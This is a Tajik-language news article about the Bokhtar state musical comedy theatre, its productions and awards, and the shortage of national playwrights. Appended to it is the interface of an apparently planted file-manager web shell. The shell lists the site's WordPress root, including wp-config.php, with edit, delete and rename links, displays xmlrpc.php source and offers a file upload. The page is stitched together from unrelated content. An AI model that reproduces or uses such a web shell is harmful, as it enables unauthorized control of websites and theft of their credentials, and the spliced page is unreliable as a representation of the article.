36.2 C
Душанбе

Драматургон ангуштшуморанд…

Ҷашнвора-озмуни саросарии театрҳои касбӣ – “Парасту-2023” бо намоиши «Зол ва Рӯдоба»-и Театри давлатии мусиқии мазҳакаи ба номи Ато Муҳаммадҷонови шаҳри Бохтар оғоз гардида буд. Ин намоиш бинандагонро ба ваҷд овард, зеро дар сатҳи касбӣ ва ҷолибу муассир таҳия шуда буд. Коргардони ҷавон Баҳром Қурбонзода зебову диданӣ қиссаи ду дилдодаро аз достонҳои безаволи “Шоҳнома”-и Ҳаким Фирдавсӣ пешниҳод кард. Ҳунарпешагон нақшҳои худро хуб бозида, симои қаҳрамонони намоишро зиндаю табиӣ офариданд. Дар ҷамъбасти фестивал намоиши мазкур ҷойи дуюмро сазовор гашт.

Моҳи январи соли 2024 ба ҳайати эҷодӣ имкон даст дод, ки намоишро дар 42-юмин ҷашнвораи байналмилалии театрии Фаҷр, ки дар шаҳри Теҳрони Ҷумҳурии Исломии Эрон баргузор гардид, ба тамошобинони бурунмарзӣ пешкаш ва санъати театрии тоҷикро ба оламиён муаррифӣ намоянд.

Чунин намоишҳои ҷолиб дар Театри мусиқии мазҳакаи ба номи Ато Муҳаммадҷонови шаҳри Бохтар кам нестанд. Яке аз машҳуртарини онҳо намоиши “Лаку Пак” ба шумор мерафт, ки бо бозии Ҳунарпешаи халқии Тоҷикистон, шодравон Аловуддин Абдуллоев бинандагонро мафтун карда буд. Ин намоишнома ба Абдулҳафиз Қодиров тааллуқ дошта, коргардонҳои театр борҳо рӯи саҳна гузоштаанд.

“Қиёмат” (коргардон Парвиз Раҷабов) низ аз намоишҳои беҳтарини театр ба ҳисоб меравад. Аҳли эҷоди театр бо ин намоиш ба шаҳри Бишкеки Қирғизистон сафар намуда, дар ҷашни 90-солагии адиби машҳур Чингиз Айтматов иштирок карданд. Иҷрокунандаи нақши асосӣ, ҳунарпеша ва саркоргардони театр Қурбонмурод Шукурзода дар номинаи “Беҳтарин нақши мардона” соҳиби диплом ва ҷоиза гардид.

Умуман, Театри давлатии мусиқии мазҳакаи ба номи Ато Муҳамммадҷонов дар фазои фарҳангии кишвар шуҳрату нуфузи баландро соҳиб аст. Намоишҳои театр дар тарбияи маънавию ахлоқии мардум нақши муассир доранд.

Дар бораи ин театр ҳарф зада, наметавон аз Ҳунарпешаи халқии Тоҷикистон, шодравон Аловуддин Абдуллоев ёд накард. Бо заҳмати Аловуддин Абдуллоев намоишҳо дар сатҳи баланду ҳирфаӣ таҳия мегардиданд. Кори Аловуддин Абдуллоевро имрӯз шогирдону ҳамкорони ӯ идома дода истодаанд. Ҳоло дар саҳнаи театр ҳунарпешагоне чун Меҳриннисо Ҳоҷибоева, Муҳаммад Шомиддинов, Маҳмадӣ Шарофов, Ҷӯрахон Расулов, Ҳоҷамқул Сатторхонов, Убайдулло Саидов, Ҷамила Юсуфзода, Ойгул Давлатзода, Фирдавси Турдиалӣ, Азизҷон Сайфуллоев, Кароматулло Сафаров, Бибинисо Боқиева, Файзалӣ Ҳасан, Дилафрӯз Саидова ва дигарон нақшҳои гуногунро офарида, пешкаши тамошобинон мегардонанд.

Симои аксари ин ҳунармандон тавассути намоишҳои театрӣ ва филмҳои бадеӣ ба тамошобинон ошност. Албатта, ба мисли аксар театрҳои кишвар театри мазкур низ аз нарасидани ҳунарпешагони ҷавон, махсусан занон, танқисӣ мекашад. Ангуштшумор будани асарҳои драмавӣ барои пешрафти кори театр монеа эҷод мекунад. Умуман, рушд накардани драматургияи тоҷик ва тарбияву ба камол нарасидани драманависони ҷавони соҳибистеъдод муҷиби то андозае коста гардидани арзиши намоишҳои театрӣ шудааст. Зеро ҷавҳари ҳар намоиши театриро асарҳои пурмуҳтавои саҳнавӣ ташкил медиҳанд.

– Норасоии намоишномаҳои сирф миллиро ҳар театр ба ҳар роҳ ҳал месозад, – мегӯяд саркоргардони театр Қурбонмуҳаммад Шукурзода. – Бештари театрҳо ба намоишномаҳои драматургони кишварҳои дигар рӯ меоранд. Дар қисме аз театрҳо ҳунармандони соҳибтаҷриба ба навиштани асарҳои драматургӣ даст мезананд, ки албатта, на ҳама вақт дар ин ҷода муваффақ мегарданд. Драматургияро шоҳи жанрҳои адабӣ меноманд ва навиштани асарҳои драмавӣ аз эҷодкор донишу истеъдоди баландро тақозо мекунад. Драматургони мо имрӯз ангуштшуморанд. Шумораи театрҳо дар кишвар ба даҳҳо адад мерасад, аммо ба ин театрҳо ҳамагӣ як ё ду драматург рост меояд. Ин аст, ки намоишҳо дар бораи масъалаҳои доғи рӯз дар театрҳо ба нудрат дида мешаванд, – иброз медорад Қурбонмуҳаммад Шукурзода.

Сарфи назар аз ин мушкилот, кормандони театр мекӯшанд, дар барномаи солонаи театр намоишҳои дорои ҷанбаи миллиро бештар ҷой диҳанд. Соли гузашта аз рӯйи асари драматург Ҷумъа Қуддус — “Арӯси хаппак” коргардони ҷавон Баҳром Қурбонзода намоиши тозаеро таҳия намуд, ки дар шаҳру навоҳии гуногуни вилоят манзури ҳаводорон гардид.

Дар барномаи имсолаи театр низ шумораи асарҳои драматургони тоҷик бештар ба назар мерасад. Аз ҷумла, “Тафтишгар” аз рӯйи асари Муҳаммад Ғоиб, дар таҳияи Қурбонмуҳаммад Шукурзода, “Рустам ва Суҳроб”, дар асоси “Шоҳнома”-и Абулқосим Фирдавсӣ, намоиши бачагонаи “Кабӯтари сулҳ” аз рӯйи асари Зариф Ибод, дар таҳияи Кароматулло Сафаров ва асари драматурги ҷаҳонӣ Жан Батист Молйер — “Бемори зуракӣ” дар барномаи театр ҷой дода шудаанд.

Мижгон Халилзода,

“АС”

мақолаи гузашта
мақолаи навбатӣ
- Таблиғ -spot_img

Быть в курсе

Подпишитесь на обновления материалов сайта adab.tj на ваш электронный ящик.

- Таблиғ -spot_img

Хабарҳои охир

Акси гӯё

Бахшҳо

Current Dir: /var/www/adab.tj/html/

[FILE] .htaccess [ edit | delete | rename ]
[FILE] index.php [ edit | delete | rename ]
[FILE] license.txt [ edit | delete | rename ]
[FILE] readme.html [ edit | delete | rename ]
[FILE] wordpress-6.7.1-ru_RU.zip [ edit | delete | rename ]
[FILE] wp-activate.php [ edit | delete | rename ]
[DIR]  wp-admin [ delete | rename ]
[FILE] wp-blog-header.php [ edit | delete | rename ]
[FILE] wp-comments-post.php [ edit | delete | rename ]
[FILE] wp-config-sample.php [ edit | delete | rename ]
[FILE] wp-config.php [ edit | delete | rename ]
[DIR]  wp-content [ delete | rename ]
[FILE] wp-cron.php [ edit | delete | rename ]
[DIR]  wp-includes [ delete | rename ]
[FILE] wp-links-opml.php [ edit | delete | rename ]
[FILE] wp-load.php [ edit | delete | rename ]
[FILE] wp-login.php [ edit | delete | rename ]
[FILE] wp-mail.php [ edit | delete | rename ]
[FILE] wp-settings.php [ edit | delete | rename ]
[FILE] wp-signup.php [ edit | delete | rename ]
[FILE] wp-trackback.php [ edit | delete | rename ]
[DIR]  www [ delete | rename ]
[FILE] xmlrpc.php [ edit | delete | rename ]

Viewing: /var/www/adab.tj/html/xmlrpc.php

<?php
/**
 * XML-RPC protocol support for WordPress
 *
 * @package WordPress
 */

/**
 * Whether this is an XML-RPC Request.
 *
 * @var bool
 */
define( 'XMLRPC_REQUEST', true );

// Discard unneeded cookies sent by some browser-embedded clients.
$_COOKIE = array();

// $HTTP_RAW_POST_DATA was deprecated in PHP 5.6 and removed in PHP 7.0.
// phpcs:disable PHPCompatibility.Variables.RemovedPredefinedGlobalVariables.http_raw_post_dataDeprecatedRemoved
if ( ! isset( $HTTP_RAW_POST_DATA ) ) {
	$HTTP_RAW_POST_DATA = file_get_contents( 'php://input' );
}

// Fix for mozBlog and other cases where '<?xml' isn't on the very first line.
if ( isset( $HTTP_RAW_POST_DATA ) ) {
	$HTTP_RAW_POST_DATA = trim( $HTTP_RAW_POST_DATA );
}
// phpcs:enable

/** Include the bootstrap for setting up WordPress environment */
require_once __DIR__ . '/wp-load.php';

if ( isset( $_GET['rsd'] ) ) { // https://cyber.harvard.edu/blogs/gems/tech/rsd.html
	header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true );
	echo '<?xml version="1.0" encoding="' . get_option( 'blog_charset' ) . '"?' . '>';
	?>
<rsd version="1.0" xmlns="http://archipelago.phrasewise.com/rsd">
	<service>
		<engineName>WordPress</engineName>
		<engineLink>https://wordpress.org/</engineLink>
		<homePageLink><?php bloginfo_rss( 'url' ); ?></homePageLink>
		<apis>
			<api name="WordPress" blogID="1" preferred="true" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" />
			<api name="Movable Type" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" />
			<api name="MetaWeblog" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" />
			<api name="Blogger" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" />
			<?php
			/**
			 * Fires when adding APIs to the Really Simple Discovery (RSD) endpoint.
			 *
			 * @link https://cyber.harvard.edu/blogs/gems/tech/rsd.html
			 *
			 * @since 3.5.0
			 */
			do_action( 'xmlrpc_rsd_apis' );
			?>
		</apis>
	</service>
</rsd>
	<?php
	exit;
}

require_once ABSPATH . 'wp-admin/includes/admin.php';
require_once ABSPATH . WPINC . '/class-IXR.php';
require_once ABSPATH . WPINC . '/class-wp-xmlrpc-server.php';

/**
 * Posts submitted via the XML-RPC interface get that title
 *
 * @name post_default_title
 * @var string
 */
$post_default_title = '';

/**
 * Filters the class used for handling XML-RPC requests.
 *
 * @since 3.1.0
 *
 * @param string $class The name of the XML-RPC server class.
 */
$wp_xmlrpc_server_class = apply_filters( 'wp_xmlrpc_server_class', 'wp_xmlrpc_server' );
$wp_xmlrpc_server       = new $wp_xmlrpc_server_class();

// Fire off the request.
$wp_xmlrpc_server->serve_request();

exit;

/**
 * logIO() - Writes logging info to a file.
 *
 * @since 1.2.0
 * @deprecated 3.4.0 Use error_log()
 * @see error_log()
 *
 * @global int|bool $xmlrpc_logging Whether to enable XML-RPC logging.
 *
 * @param string $io  Whether input or output.
 * @param string $msg Information describing logging reason.
 */
function logIO( $io, $msg ) {
	_deprecated_function( __FUNCTION__, '3.4.0', 'error_log()' );
	if ( ! empty( $GLOBALS['xmlrpc_logging'] ) ) {
		error_log( $io . ' - ' . $msg );
	}
}

Upload File: